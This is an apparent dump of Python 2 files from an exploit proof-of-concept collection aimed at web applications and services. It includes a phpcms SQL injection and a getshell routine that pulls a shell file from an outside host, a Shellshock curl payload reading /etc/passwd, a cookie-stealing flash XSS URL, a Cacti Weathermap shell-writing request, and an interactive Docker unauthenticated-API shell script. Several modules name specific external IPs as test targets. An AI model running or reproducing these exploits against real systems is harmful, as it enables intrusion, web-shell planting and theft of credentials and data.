3 |
4 |
5 | if 'phpcms' in context or 'phpcms' in head:
6 | return True
7 | else:
8 | return False
--------------------------------------------------------------------------------
/cms/phpcms/phpcms_v9_6.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 |
4 |
5 | from ..t import T
6 |
7 | import requests
8 | import random
9 | import string
10 | import hashlib
11 | import re
12 | import threading
13 |
14 |
15 |
16 |
17 |
18 |
19 | class P(T):
20 | def __init__(self):
21 | T.__init__(self)
22 | def verify(self,head='',context='',ip='',port='',productname={},keywords='',hackinfo=''):
23 | arg='http://'+ip+':'+port
24 |
25 | result = {}
26 | result['result']=False
27 | try:
28 | url1 = '{}/index.php?m=wap&c=index&a=int&siteid=1'.format(arg)
29 | s =requests.Session()
30 | req = s.get(url1)
31 | flag = ''.join([random.choice(string.digits) for _ in range(2)])
32 | flag_hash = hashlib.md5(flag).hexdigest()
33 | url2 = '{}/index.php?m=attachment&c=attachments&a=swfupload_json&aid=1&src=%26id=%*27%20and%20updatexml%281%2Cconcat%281%2C%28md5%28{}%29%29%29%2C1%29%23%26m%3D1%26f%3Dhaha%26modelid%3D2%26catid%3D7%26'.format(arg,flag)
34 | cookie = requests.utils.dict_from_cookiejar(s.cookies)
35 | cookies = re.findall(r"siteid': '(.*?)'",str(cookie))[0]
36 | data = {"userid_flash":cookies}
37 | r = s.post(url=url2,data=data)
38 | a_k = r.headers['Set-Cookie'][61:]
39 | url3 = '{}/index.php?m=content&c=down&a_k={}'.format(arg,a_k)
40 | if flag_hash[16:] in s.get(url3).content:
41 | output(url3,result,'hole')
42 |
43 | except:
44 | print 'requests error.'
45 | pass
46 |
47 | return result
48 |
49 |
50 |
51 |
52 | def getshell(self,host):
53 | try:
54 | url = '%s/index.php?m=member&c=index&a=register&siteid=1' % host
55 | flag = ''.join([random.choice(string.lowercase) for _ in range(8)])
56 | flags = ''.join([random.choice(string.digits) for _ in range(8)])
57 | headers = {
58 | 'Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
59 | 'Accept-Encoding':'gzip, deflate',
60 | 'Accept-Language':'zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3',
61 | 'Upgrade-Insecure-Requests':'1',
62 | 'Content-Type': 'application/x-www-form-urlencoded',
63 | 'User-Agent':'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0'}
64 | data = "siteid=1&modelid=11&username={}&password=ad{}min&email={}@cnnetarmy.com&info%5Bcontent%5D=%3Cimg%20src=http://www.cnnetarmy.com/soft/shell.txt?.php#.jpg>&dosubmit=1&protocol=".format(flag,flags,flag)
65 | r = requests.post(url=url,headers=headers,data=data,timeout=5)
66 | #print r.content
67 | shell_path = re.findall(r'lt;img src=(.*?)>',str(r.content))[0]
68 | print '[*] shell: %s | pass is: cmd' % shell_path
69 | with open('sql_ok.txt','a')as tar:
70 | tar.write(shell_path)
71 | tar.write('\n')
72 | except:
73 | print 'requests error.'
74 | pass
75 | def output(url,result,label):
76 | info = url + ' phpcmsv9.6 Vul '
77 | result['result']=True
78 | result['VerifyInfo'] = {}
79 | result['VerifyInfo']['type']='sqlli inject'
80 | result['VerifyInfo']['URL'] =url
81 | result['VerifyInfo']['payload']='/root/github/poccreate/thirdparty/phpcms/phpcms_v9_6.py'
82 | result['VerifyInfo']['level']=label
83 | result['VerifyInfo']['result'] =info
84 |
85 | if __name__ == '__main__':
86 | print P().verify(ip='http://yunlai.cn:803/sfdsfds',port='80')
87 |
88 |
--------------------------------------------------------------------------------
/cms/phpcms/t.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # encoding: utf-8
3 |
4 |
5 | class T(object):
6 | def __init__(self):
7 |
8 | self.result = {
9 | 'type': None,
10 | 'version': None,
11 | }
12 | self.keywords = []
13 | self.versions = []
14 |
15 | def match_rule(self,head='',context='',ip='',port='',productname={},keywords='',hackinfo='', **kw):
16 | ##
17 | #head 返回的请求头
18 | #context 返回请求正文html代码
19 | #ip 请求ip
20 | #port 请求端口
21 | #productname 请求的组件产品
22 | #keywords 暂时已知的关键词组件
23 | #hackinfo 备用字段
24 |
25 |
26 |
27 |
28 | return True
29 | def verify(self,head='',context='',ip='',port='',productname={},keywords='',hackinfo=''):
30 | result = {}
31 | result['result']=False
32 | return result
33 | def attack(self,head='',context='',ip='',port='',productname={},keywords='',hackinfo=''):
34 | result = {}
35 | result['result']=False
36 | return result
37 | def parse_output(self, result):
38 | result = {}
39 | result['result']=False
40 | return result
--------------------------------------------------------------------------------
/cms/sdcms/__init__.py:
--------------------------------------------------------------------------------
1 | KEYWORDS = ['sdcms', ]
2 | def rules(head='',context='',ip='',port='',productname={},keywords='',hackinfo=''):
3 |
4 |
5 | if 'sdcms' in context or 'sdcms' in head:
6 | return True
7 | else:
8 | return False
--------------------------------------------------------------------------------
/cms/sdcms/sdcms_3114b79e6d650cbdbaf0e8f592f884ad.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env
2 | #*_* coding: utf-8 *_*
3 |
4 | #name: swfUpload.swf|uploadify.swf flash xss 合集
5 | #author: yichin
6 | #refer: http://www.wooyun.org/bugs/wooyun-2014-069833/
7 | from ..miniCurl import Curl
8 | from ..t import T
9 |
10 | import md5
11 |
12 |
13 | class P(T):
14 | def __init__(self):
15 | T.__init__(self)
16 | def verify(self,head='',context='',ip='',port='',productname={},keywords='',hackinfo=''):
17 | arg='http://'+ip+':'+port+'/'
18 | curl=Curl()
19 | result = {}
20 | result['result']=False
21 |
22 | md5_list = [
23 | '3a1c6cc728dddc258091a601f28a9c12',
24 | '53fef78841c3fae1ee992ae324a51620',
25 | '4c2fc69dc91c885837ce55d03493a5f5',
26 | ]
27 | code, head, res, err, _ = curl.curl2(arg)
28 | if code == 200:
29 | md5_value = md5.new(res).hexdigest()
30 | if md5_value in md5_list:
31 | output(arg + '?movieName=%22]%29}catch%28e%29{if%28!window.x%29{window.x=1;alert%28document.cookie%29}}// flash xss',result,'warning')
32 | else:
33 | #debug(arg + ' **_**' + md5_value)
34 | pass
35 | else:
36 | #debug(arg + '**__**not found')
37 | pass
38 |
39 |
40 | del curl
41 | return result
42 |
43 |
44 | def output(url,result,label):
45 | info = url + ' sdcms Vul '
46 | result['result']=True
47 | result['VerifyInfo'] = {}
48 | result['VerifyInfo']['type']='sdcms Vul'
49 | result['VerifyInfo']['URL'] =url
50 | result['VerifyInfo']['payload']='/root/github/poccreate/thirdparty/sdcms/sdcms_3114b79e6d650cbdbaf0e8f592f884ad.py'
51 | result['VerifyInfo']['level']=label
52 | result['VerifyInfo']['result'] =info
53 |
54 | if __name__ == '__main__':
55 | print P().verify(ip='http://yunlai.cn:803/sfdsfds/',port='80')
56 | print P().verify(ip='http://yunlai.cn:803/sfdsfds/',port='80')
57 | print P().verify(ip='http://yunlai.cn:803/sfdsfds/',port='80')
58 | print P().verify(ip='http://yunlai.cn:803/sfdsfds/',port='80')
59 | print P().verify(ip='http://yunlai.cn:803/sfdsfds/',port='80')
60 | print P().verify(ip='http://yunlai.cn:803/sfdsfds/',port='80')
61 | print P().verify(ip='http://yunlai.cn:803/sfdsfds/',port='80')
62 | print P().verify(ip='http://yunlai.cn:803/sfdsfds/',port='80')
63 | print P().verify(ip='http://yunlai.cn:803/sfdsfds/',port='80')
64 | print P().verify(ip='http://yunlai.cn:803/sfdsfds/',port='80')
65 | print P().verify(ip='http://yunlai.cn:803/sfdsfds/',port='80')
66 | print P().verify(ip='http://yunlai.cn:803/sfdsfds/',port='80')
67 |
68 |
69 | #/root/github/poccreate/thirdparty/sdcms/sdcms_3114b79e6d650cbdbaf0e8f592f884ad.py
70 | #/root/github/poccreate/codesrc/exp-1817.py
--------------------------------------------------------------------------------
/cms/t.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # encoding: utf-8
3 |
4 |
5 | class T(object):
6 | def __init__(self):
7 |
8 | self.result = {
9 | 'type': None,
10 | 'version': None,
11 | }
12 | self.keywords = []
13 | self.versions = []
14 |
15 | def match_rule(self,head='',context='',ip='',port='',productname={},keywords='',hackinfo='', **kw):
16 | ##
17 | #head 返回的请求头
18 | #context 返回请求正文html代码
19 | #ip 请求ip
20 | #port 请求端口
21 | #productname 请求的组件产品
22 | #keywords 暂时已知的关键词组件
23 | #hackinfo 备用字段
24 |
25 |
26 |
27 |
28 | return True
29 | def verify(self,head='',context='',ip='',port='',productname={},keywords='',hackinfo=''):
30 | result = {}
31 | result['result']=False
32 | return result
33 | def attack(self,head='',context='',ip='',port='',productname={},keywords='',hackinfo=''):
34 | result = {}
35 | result['result']=False
36 | return result
37 | def parse_output(self, result):
38 | result = {}
39 | result['result']=False
40 | return result
--------------------------------------------------------------------------------
/component/JDWP/JDWPvul.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # encoding: utf-8
3 | from t import T
4 | import os
5 | import platform
6 | import subprocess
7 | import signal
8 | import time
9 | import requests,urllib2,json,urlparse
10 |
11 | class TimeoutError(Exception):
12 | pass
13 | def command(cmd, timeout=60):
14 | """Run command and return the output
15 | cmd - the command to run
16 | timeout - max seconds to wait for
17 | """
18 | is_linux = platform.system() == 'Linux'
19 |
20 | p = subprocess.Popen(cmd, stderr=subprocess.STDOUT, stdout=subprocess.PIPE, shell=True, preexec_fn=os.setsid if is_linux else None)
21 | if timeout==0:
22 | return p.stdout.read()
23 | t_beginning = time.time()
24 | seconds_passed = 0
25 | while True:
26 | if p.poll() is not None:
27 | break
28 | seconds_passed = time.time() - t_beginning
29 | if timeout and seconds_passed > timeout:
30 | if is_linux:
31 | os.killpg(p.pid, signal.SIGTERM)
32 | else:
33 | p.terminate()
34 | raise TimeoutError(cmd, timeout)
35 | time.sleep(0.1)
36 | return p.stdout.read()
37 | class P(T):
38 | def __init__(self):
39 | T.__init__(self)
40 | def verify(self,head='',context='',ip='',port='',productname={},keywords='',hackinfo=''):
41 |
42 | result = {}
43 | result['result']=False
44 |
45 | usecommand='python '+os.path.split(os.path.realpath(__file__))[0]+'/script/jdwpshellifier.py -t '+ip+' -p '+port
46 | try:
47 | print usecommand
48 | msgresult = command(usecommand, timeout=40)
49 | print msgresult
50 | if 'Command successfully executed' in msgresult:
51 | result['result']=True
52 | result['VerifyInfo'] = {}
53 | result['VerifyInfo']['type']='Java Debug Wire Protocol vul'
54 | result['VerifyInfo']['URL'] =ip+':'+port
55 | result['VerifyInfo']['payload']='Java Debug Wire Protocol poc'
56 | result['VerifyInfo']['result'] =msgresult
57 | else:
58 | pass
59 | except Exception,e:
60 | print e.text
61 | finally:
62 |
63 | return result
64 | if __name__ == '__main__':
65 | print P().verify(ip='120.24.243.216',port='8001')
66 |
--------------------------------------------------------------------------------
/component/JDWP/__init__.py:
--------------------------------------------------------------------------------
1 | KEYWORDS = ['jdwp', ]
2 | def rules(head='',context='',ip='',port='',productname={},keywords='',hackinfo=''):
3 |
4 |
5 | if 'jdwp' in productname.get('protocol','') or 'Java Debug Wire Protocol' in productname.get('productname',''):
6 | return True
7 | else:
8 |
9 | return False
--------------------------------------------------------------------------------
/component/JDWP/t.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # encoding: utf-8
3 |
4 |
5 | class T(object):
6 | def __init__(self):
7 |
8 | self.result = {
9 | 'type': None,
10 | 'version': None,
11 | }
12 | self.keywords = []
13 | self.versions = []
14 | def match_rule(self,head='',context='',ip='',port='',productname={},keywords='',hackinfo='', **kw):
15 | ##
16 | #head 返回的请求头
17 | #context 返回请求正文html代码
18 | #ip 请求ip
19 | #port 请求端口
20 | #productname 请求的组件产品
21 | #keywords 暂时已知的关键词组件
22 | #hackinfo 备用字段
23 |
24 |
25 |
26 |
27 | return True
28 |
29 | def verify(self,head='',context='',ip='',port='',productname={},keywords='',hackinfo=''):
30 | result = {}
31 | result['result']=False
32 | return result
33 | def attack(self,head='',context='',ip='',port='',productname={},keywords='',hackinfo=''):
34 | result = {}
35 | result['result']=False
36 | return result
37 | def parse_output(self, result):
38 | result = {}
39 | result['result']=False
40 | return result
--------------------------------------------------------------------------------
/component/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/nanshihui/PocCollect/e13e137901bc91ae44465a1c9d88a9961dbab6bf/component/__init__.py
--------------------------------------------------------------------------------
/component/bash/__init__.py:
--------------------------------------------------------------------------------
1 | KEYWORDS = ['cgi', ]
2 | def rules(head='',context='',ip='',port='',productname={},keywords='',hackinfo=''):
3 |
4 |
5 | if 'cgi-bin' in hackinfo or 'cgi-bin' in context:
6 | return True
7 | else:
8 |
9 | return False
--------------------------------------------------------------------------------
/component/bash/bash.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # encoding: utf-8
3 | from t import T
4 | import os
5 | import platform
6 | import subprocess
7 | import signal
8 | import time
9 | import requests,urllib2,json,urlparse
10 |
11 | class TimeoutError(Exception):
12 | pass
13 | def command(cmd, timeout=60):
14 | """Run command and return the output
15 | cmd - the command to run
16 | timeout - max seconds to wait for
17 | """
18 | is_linux = platform.system() == 'Linux'
19 |
20 | p = subprocess.Popen(cmd, stderr=subprocess.STDOUT, stdout=subprocess.PIPE, shell=True, preexec_fn=os.setsid if is_linux else None)
21 | if timeout==0:
22 | return p.stdout.read()
23 | t_beginning = time.time()
24 | seconds_passed = 0
25 | while True:
26 | if p.poll() is not None:
27 | break
28 | seconds_passed = time.time() - t_beginning
29 | if timeout and seconds_passed > timeout:
30 | if is_linux:
31 | os.killpg(p.pid, signal.SIGTERM)
32 | else:
33 | p.terminate()
34 | raise TimeoutError(cmd, timeout)
35 | time.sleep(0.1)
36 | return p.stdout.read()
37 | class P(T):
38 | def __init__(self):
39 | T.__init__(self)
40 | def verify(self,head='',context='',ip='',port='',productname={},keywords='',hackinfo=''):
41 |
42 | result = {}
43 | result['result']=False
44 | r=None
45 | list=['/cgi-bin/test-cgi','/cgi-bin/test.cgi','/cgi-bin/load.cgi', '/cgi-bin/gsweb.cgi', '/cgi-bin/redirector.cgi',
46 | '/cgi-bin/index.cgi', '/cgi-bin/help.cgi', '/cgi-bin/about.cgi', '/cgi-bin/vidredirect.cgi',
47 | '/cgi-bin/click.cgi', '/cgi-bin/details.cgi', '/cgi-bin/log.cgi', '/cgi-bin/viewcontent.cgi',
48 | '/cgi-bin/content.cgi', '/cgi-bin/admin.cgi', '/cgi-bin/webmail.cgi']
49 |
50 | try:
51 | for i in list:
52 | usecommand = 'curl -A "() { ignore;};echo;/bin/cat /etc/passwd" http://' + ip + ':' + port + i
53 | msgresult = command(usecommand, timeout=3)
54 | print msgresult
55 | if 'root' in msgresult:
56 | result['result']=True
57 | result['VerifyInfo'] = {}
58 | result['VerifyInfo']['type']='bash vul'
59 | result['VerifyInfo']['URL'] =ip+':'+port+"/cgi-bin/test-cgi"
60 | result['VerifyInfo']['payload']=usecommand
61 | result['VerifyInfo']['result'] =msgresult
62 | break
63 | else:
64 | if 'not found' in msgresult:
65 | pass
66 | else:
67 | break
68 | except Exception,e:
69 | print e.text
70 | finally:
71 | if r is not None:
72 | r.close()
73 | return result
74 | if __name__ == '__main__':
75 | # print P().verify(ip='61.146.115.83',port='81')
76 | print P().verify(ip='58.117.96.180', port='80')
77 |
--------------------------------------------------------------------------------
/component/bash/t.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # encoding: utf-8
3 |
4 |
5 | class T(object):
6 | def __init__(self):
7 |
8 | self.result = {
9 | 'type': None,
10 | 'version': None,
11 | }
12 | self.keywords = []
13 | self.versions = []
14 | def match_rule(self,head='',context='',ip='',port='',productname={},keywords='',hackinfo='', **kw):
15 | ##
16 | #head 返回的请求头
17 | #context 返回请求正文html代码
18 | #ip 请求ip
19 | #port 请求端口
20 | #productname 请求的组件产品
21 | #keywords 暂时已知的关键词组件
22 | #hackinfo 备用字段
23 |
24 |
25 |
26 |
27 | return True
28 |
29 | def verify(self,head='',context='',ip='',port='',productname={},keywords='',hackinfo=''):
30 | result = {}
31 | result['result']=False
32 | return result
33 | def attack(self,head='',context='',ip='',port='',productname={},keywords='',hackinfo=''):
34 | result = {}
35 | result['result']=False
36 | return result
37 | def parse_output(self, result):
38 | result = {}
39 | result['result']=False
40 | return result
--------------------------------------------------------------------------------
/component/cacti/__init__.py:
--------------------------------------------------------------------------------
1 | KEYWORDS = ['cacti', ]
2 | def rules(head='',context='',ip='',port='',productname={},keywords='',hackinfo=''):
3 |
4 |
5 | if 'Cacti' in context :
6 | return True
7 | else:
8 |
9 | return False
--------------------------------------------------------------------------------
/component/cacti/cactifiledisclosure.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # encoding: utf-8
3 | from t import T
4 |
5 | import requests,urllib2,json,urlparse
6 | class P(T):
7 | def __init__(self):
8 | T.__init__(self)
9 | def verify(self,head='',context='',ip='',port='',productname={},keywords='',hackinfo=''):
10 | target_url = "http://"+ip+":"+str(port)+"/cacti.sql"
11 | result = {}
12 | result['result']=False
13 | r=None
14 | try:
15 | r=requests.get(url=target_url,timeout=2)
16 | if r.status_code==200:
17 | result['result']=True
18 | result['VerifyInfo'] = {}
19 | result['VerifyInfo']['type']='cacti file disclosure'
20 | result['VerifyInfo']['URL'] =ip+"/cacti.sql"
21 | result['VerifyInfo']['payload']='IP/cacti.sql'
22 | result['VerifyInfo']['result'] =''
23 | else:
24 | pass
25 | except Exception,e:
26 | print e.text
27 | finally:
28 | if r is not None:
29 | r.close()
30 | del r
31 | return result
32 | if __name__ == '__main__':
33 | print P().verify(ip='140.114.108.4',port='80')
34 |
--------------------------------------------------------------------------------
/component/cacti/cactiweathermap.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # encoding: utf-8
3 | from t import T
4 |
5 | import requests,urllib2,json,urlparse
6 | class P(T):
7 | def __init__(self):
8 | T.__init__(self)
9 | def verify(self,head='',context='',ip='',port='',productname={},keywords='',hackinfo=''):
10 | target_url = "http://"+ip+":"+str(port)+"/plugins/weathermap/editor.php"
11 | result = {}
12 | result['result']=False
13 | r=None
14 | try:
15 | r=requests.get(url=target_url,timeout=2)
16 | if r.status_code==200:
17 |
18 | shell_url = "http://"+ip+":"+str(port)+"/plugins/weathermap/editor.php?plug=0&mapname=test.php&action=set_map_properties¶m=¶m2=&debug=existing&node_name=&node_x=&node_y=&node_new_name=&node_label=&node_infourl=&node_hover=&node_iconfilename=--NONE--&link_name=&link_bandwidth_in=&link_bandwidth_out=&link_target=&link_width=&link_infourl=&link_hover=&map_title=&map_legend=Traffic+Load&map_stamp=Created:+%b+%d+%Y+%H:%M:%S&map_linkdefaultwidth=7&map_linkdefaultbwin=100M&map_linkdefaultbwout=100M&map_width=800&map_height=600&map_pngfile=&map_htmlfile=&map_bgfile=--NONE--&mapstyle_linklabels=percent&mapstyle_htmlstyle=overlib&mapstyle_a rrowstyle=classic&mapstyle_nodefont=3&mapstyle_linkfont=2&mapstyle_legendfont=4&item_configtext=Name"
19 | r=requests.get(url=shell_url,timeout=2)
20 | if r.status_code == 200:
21 | result['result'] = True
22 | result['VerifyInfo'] = {}
23 | result['VerifyInfo']['type'] = 'cacti weathermap code exploit'
24 | result['VerifyInfo']['URL'] = ip + "/plugins/weathermap/editor.php"
25 | result['VerifyInfo']['payload'] = 'IP/plugins/weathermap/editor.php'
26 | result['VerifyInfo']['result'] = r.text
27 | result['VerifyInfo']['shellurl'] ='plugins/weathermap/configs/test.php pass is 0'
28 |
29 | else:
30 | target_url = "http://"+ip+":"+str(port)+"/cacti/plugins/weathermap/editor.php"
31 |
32 | r=requests.get(url=target_url,timeout=2)
33 | if r.status_code==200:
34 |
35 | shell_url = "http://"+ip+":"+str(port)+"/cacti/plugins/weathermap/editor.php?plug=0&mapname=test.php&action=set_map_properties¶m=¶m2=&debug=existing&node_name=&node_x=&node_y=&node_new_name=&node_label=&node_infourl=&node_hover=&node_iconfilename=--NONE--&link_name=&link_bandwidth_in=&link_bandwidth_out=&link_target=&link_width=&link_infourl=&link_hover=&map_title=&map_legend=Traffic+Load&map_stamp=Created:+%b+%d+%Y+%H:%M:%S&map_linkdefaultwidth=7&map_linkdefaultbwin=100M&map_linkdefaultbwout=100M&map_width=800&map_height=600&map_pngfile=&map_htmlfile=&map_bgfile=--NONE--&mapstyle_linklabels=percent&mapstyle_htmlstyle=overlib&mapstyle_a rrowstyle=classic&mapstyle_nodefont=3&mapstyle_linkfont=2&mapstyle_legendfont=4&item_configtext=Name"
36 | r=requests.get(url=shell_url,timeout=2)
37 | if r.status_code == 200:
38 | result['VerifyInfo'] = {}
39 | result['VerifyInfo']['shellurl'] ='/cacti/plugins/weathermap/configs/test.php pass is 0'
40 | result['result'] = True
41 |
42 | result['VerifyInfo']['type'] = 'cacti weathermap code exploit'
43 | result['VerifyInfo']['URL'] = ip + "/cacti/plugins/weathermap/editor.php"
44 | result['VerifyInfo']['payload'] = 'IP/cacti/plugins/weathermap/editor.php'
45 | result['VerifyInfo']['result'] = r.text
46 | except Exception,e:
47 | print e.text
48 | finally:
49 | if r is not None:
50 | r.close()
51 | del r
52 | return result
53 | if __name__ == '__main__':
54 | print P().verify(ip='140.114.108.4',port='80')
55 |
--------------------------------------------------------------------------------
/component/cacti/t.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # encoding: utf-8
3 |
4 |
5 | class T(object):
6 | def __init__(self):
7 |
8 | self.result = {
9 | 'type': None,
10 | 'version': None,
11 | }
12 | self.keywords = []
13 | self.versions = []
14 | def match_rule(self,head='',context='',ip='',port='',productname={},keywords='',hackinfo='', **kw):
15 | ##
16 | #head 返回的请求头
17 | #context 返回请求正文html代码
18 | #ip 请求ip
19 | #port 请求端口
20 | #productname 请求的组件产品
21 | #keywords 暂时已知的关键词组件
22 | #hackinfo 备用字段
23 |
24 |
25 |
26 |
27 | return True
28 |
29 | def verify(self,head='',context='',ip='',port='',productname={},keywords='',hackinfo=''):
30 | result = {}
31 | result['result']=False
32 | return result
33 | def attack(self,head='',context='',ip='',port='',productname={},keywords='',hackinfo=''):
34 | result = {}
35 | result['result']=False
36 | return result
37 | def parse_output(self, result):
38 | result = {}
39 | result['result']=False
40 | return result
--------------------------------------------------------------------------------
/component/docker/__init__.py:
--------------------------------------------------------------------------------
1 | KEYWORDS = ['docker', ]
2 | def rules(head='',context='',ip='',port='',productname={},keywords='',hackinfo=''):
3 |
4 |
5 | if port =='2375' :
6 | return True
7 | else:
8 |
9 | return False
--------------------------------------------------------------------------------
/component/docker/dockerleak.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # encoding: utf-8
3 | from t import T
4 | import os
5 | import platform
6 | import subprocess
7 | import signal
8 | import time
9 | import requests,urllib2,json,urlparse
10 |
11 | class TimeoutError(Exception):
12 | pass
13 | def command(cmd, timeout=60):
14 | """Run command and return the output
15 | cmd - the command to run
16 | timeout - max seconds to wait for
17 | """
18 | is_linux = platform.system() == 'Linux'
19 |
20 | p = subprocess.Popen(cmd, stderr=subprocess.STDOUT, stdout=subprocess.PIPE, shell=True, preexec_fn=os.setsid if is_linux else None)
21 | if timeout==0:
22 | return p.stdout.read()
23 | t_beginning = time.time()
24 | seconds_passed = 0
25 | while True:
26 | if p.poll() is not None:
27 | break
28 | seconds_passed = time.time() - t_beginning
29 | if timeout and seconds_passed > timeout:
30 | if is_linux:
31 | os.killpg(p.pid, signal.SIGTERM)
32 | else:
33 | p.terminate()
34 | raise TimeoutError(cmd, timeout)
35 | time.sleep(0.1)
36 | return p.stdout.read()
37 | class P(T):
38 | def __init__(self):
39 | T.__init__(self)
40 | def verify(self,head='',context='',ip='',port='',productname={},keywords='',hackinfo=''):
41 |
42 | result = {}
43 | result['result']=False
44 | r=None
45 | targeturl='http://'+ip+':2375'
46 |
47 | try:
48 |
49 | usecommand = 'python '+ os.path.split(os.path.realpath(__file__))[0]+'/script/docker_unauth.py -url '+targeturl+' -step check'
50 | msgresult = command(usecommand, timeout=5)
51 | print msgresult
52 | if 'find vulnerable' in msgresult:
53 | result['result']=True
54 | result['VerifyInfo'] = {}
55 | result['VerifyInfo']['type']='docker unauth vul'
56 | result['VerifyInfo']['URL'] =ip+':'+port
57 | result['VerifyInfo']['payload']=usecommand
58 | result['VerifyInfo']['result'] =msgresult
59 |
60 |
61 | except Exception,e:
62 | print e.text
63 | finally:
64 | if r is not None:
65 | r.close()
66 | return result
67 | if __name__ == '__main__':
68 | print P().verify(ip='139.217.25.172', port='2375')
69 |
--------------------------------------------------------------------------------
/component/docker/script/docker_unauth.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding:utf-8 -*-
3 | from urlparse import urlparse, urlunparse, urljoin
4 | import json,socket
5 | import time
6 | import argparse
7 |
8 | notice = u'''
9 | '''
10 |
11 | class WavsPlugin():
12 | def choosedocker(self,sock, DocerVulns):
13 | total = len(DocerVulns)
14 | while True:
15 | print "You Can Control: "+str(len(DocerVulns))+" dockers"
16 | for docker in DocerVulns:
17 | print '--'*15
18 | print docker
19 | print "Enter 'q' for quit."
20 | dockerid = raw_input("The ID:")
21 | if dockerid == "q":
22 | break
23 | try:
24 | num = int(dockerid) - 1
25 | if num in range(0, total):
26 | print dockerid
27 | Id = DocerVulns[num].split("#")[2]
28 | Command = DocerVulns[num].split("#")[3]
29 | self.getexec(sock, Id, Command)
30 | except Exception, e:
31 | print "something error..try again.."
32 | print "bye bye..."
33 | sock.close()
34 | return
35 |
36 | def getexec(self, sock, Id, Command):
37 | # print "Command: "+Command
38 | # print "Id: "+Id
39 | # Created My Id
40 | # 12 bytes of Id
41 | ContainerId = Id
42 | execDockerPOSTOne = '''\
43 | POST /v1.20/containers/ContainerId/exec HTTP/1.1
44 | Host: 115.123.123.123:2375
45 | User-Agent: Docker-Client/1.8.0 (windows)
46 | Content-Length: 156
47 | Content-Type: application/json
48 | Accept-Encoding: gzip
49 | {"User":"","Privileged":false,"Tty":true,"Container":"ContainerId","AttachStdin":true,"AttachStderr":true,"AttachStdout":true,"Detach":false,"Cmd":["Command"]}
50 | '''
51 | execDockerPOSTOne = execDockerPOSTOne.replace('ContainerId', ContainerId).replace('Command', Command)
52 | sock.sendall(execDockerPOSTOne)
53 | createInfo = sock.recv(1024*10)
54 | # print createInfo
55 | strlist = createInfo.split('\n')
56 | CreatedId = json.loads(strlist[6])['Id']
57 | # print "CreatedId = " + CreatedId
58 |
59 | execDockerTwo = "/v1.20/exec/"+Id+"/resize?h=33&w=80"
60 | execDockerPOSTtwo = '''\
61 | POST /v1.20/exec/CreatedId/start HTTP/1.1
62 | Host: 115.123.123.79:2375
63 | User-Agent: Docker-Client/1.8.0 (windows)
64 | Content-Length: 163
65 | Connection: Upgrade
66 | Content-Type: text/plain
67 | Upgrade: tcp
68 | {"User":"","Privileged":false,"Tty":true,"Container":"ContainerId","AttachStdin":true,"AttachStderr":true,"AttachStdout":true,"Detach":false,"Cmd":["Command"]}
69 | '''
70 | execDockerPOSTtwo = execDockerPOSTtwo.replace('ContainerId', ContainerId).replace('Command', Command)
71 | execDockerPOSTtwo = execDockerPOSTtwo.replace("CreatedId", CreatedId)
72 | time.sleep(1)
73 | sock.sendall(execDockerPOSTtwo)
74 | startinfo = sock.recv(1024*10)
75 | while True:
76 | print "nter q for quit."
77 | cmd = raw_input("$:")
78 | sock.sendall(cmd+'\x0d')
79 | time.sleep(2)
80 | if "q" == cmd:
81 | return
82 | print sock.recv(1024*10)
83 |
84 | def cmd_run(self, url, step):
85 | print notice
86 | urlinfo = urlparse(url)
87 | baseurl = urlunparse((urlinfo.scheme, urlinfo.netloc, '/', '', '', ''))
88 | print "Checking "+baseurl
89 | host, port = urlinfo.netloc.split(":")
90 | socket.setdefaulttimeout(5)
91 | try:
92 | poc = "containers/json"
93 | psall = "v1.20/containers/json?all=1"
94 | pocget = '''GET '''+baseurl+poc+''' HTTP/1.1\r\nHost: '''+host+":"+port+'''\r\n\r\n'''
95 | psget = '''GET '''+baseurl+psall+''' HTTP/1.1\r\nHost: '''+host+":"+port+'''\r\n\r\n'''
96 |
97 | sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
98 | server_address = (host, int(port))
99 | sock.connect(server_address)
100 | if "check" == step:
101 | sock.sendall(pocget)
102 | time.sleep(2)
103 | pocinfo = sock.recv(1024*10)
104 | if "Command" in pocinfo and "Server: Docker" in pocinfo:
105 | print "{url} find vulnerable.".format(url=url)
106 | else:
107 | print "{url} is not vulnerable.".format(url=url)
108 | exit(0)
109 |
110 | sock.sendall(psget)
111 | time.sleep(2)
112 | psinfo = sock.recv(1024*200)
113 | strlist = psinfo.split('\r\n')
114 | dockerpsstr = strlist[7]
115 |
116 | decoded = json.loads(dockerpsstr)
117 |
118 | DocerVulns = []
119 | count = 1
120 | Command = ""
121 | Id = ""
122 | accessCommand = ['sh', '/bin/sh', '/bin/bash', 'bash', '/bin/csh', 'csh',
123 | '/bin/ksh', 'ksh', '/bin/tcsh', 'tcsh', '/bin/zsh', 'zsh']
124 | for i in decoded:
125 | if ("Up" in i['Status']) and ("Exited" not in i['Status']) and (i['Command'] in accessCommand):
126 | Command = i['Command']
127 | Id = i['Id']
128 | ImageName = i['Image']
129 | dockervuln = "ID:"+str(count)+". #System:"+ImageName+" #"+Id[0:12]+"#"+Command
130 | DocerVulns.append(dockervuln)
131 | count = count + 1
132 |
133 | if len(DocerVulns) == 0:
134 | print "nothing can be used!"
135 | sock.close()
136 | return
137 | else:
138 | self.choosedocker(sock, DocerVulns)
139 | sock.close()
140 | except Exception, e:
141 | print "Failed to connection target"
142 | exit(0)
143 | sock.close()
144 |
145 | if __name__ == '__main__':
146 | parser = argparse.ArgumentParser()
